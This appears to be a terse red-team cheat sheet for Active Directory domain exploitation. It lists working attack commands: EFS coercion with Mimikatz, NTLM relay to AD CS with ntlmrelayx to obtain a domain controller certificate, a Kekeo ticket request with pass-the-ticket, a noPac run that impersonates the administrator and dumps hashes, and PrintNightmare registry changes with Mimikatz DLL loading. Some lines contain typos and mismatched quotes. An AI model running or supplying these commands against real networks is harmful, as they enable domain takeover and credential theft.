Domain Exploitation

NTLM Replay

Mimikatz

Catch the response:

Misc::efs /server:red-win2016-dc.rednet.local /noauth /connect:localIP

impacket

ntlmrelayx.py -debug -smb2support --target http://red-win2016-dc.rednet.local/certsrv/certfnsh.asp --adcs --template DomainController

Kekeo

turn b64 on and Copy the cert provided from impacket:

Base64 /input:on
Tgt:ask /pfx:CERT /user:host$ /domain:rednet.local /ptt

NoPac/ SamTheAdmin:

git clone https://github.com/Ridter/noPac

python3 noPac.py DOMAIN/USER':'PASSWORD' -dc-ip 10.10.1.11 -dc-host V-DC  --impersonate administrator -dump -use-ldap

PrintNightmare

Registry keys

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
reg add 'hklm\software\policies\Microsoft\windows NT\Printers /f /v RegisterSpoolerRemoteRpcEndPoint /t REG_DWORD /d 2

Mimikatz

misc::printnightmare /server:localhost /library:c:\security:mimispool.dll
misc::printmightmare /server:localhost